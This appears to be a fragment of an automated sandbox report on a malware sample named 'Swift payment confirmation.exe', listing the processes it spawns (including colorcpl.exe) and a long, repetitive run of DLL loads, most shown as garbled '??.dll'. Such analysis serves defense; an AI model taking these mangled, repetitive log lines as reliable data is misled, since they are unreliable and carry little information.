            Source: unknownProcess created: C:\Users\user\Desktop\Swift payment confirmation.exe "C:\Users\user\Desktop\Swift payment confirmation.exe"
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exe
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeProcess created: C:\Windows\SysWOW64\colorcpl.exe C:\Windows\System32\colorcpl.exeJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: url.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
            Source: C:\Users\user\Desktop\Swift payment confirmation.exeSection loaded: ??.dllJump to behavior
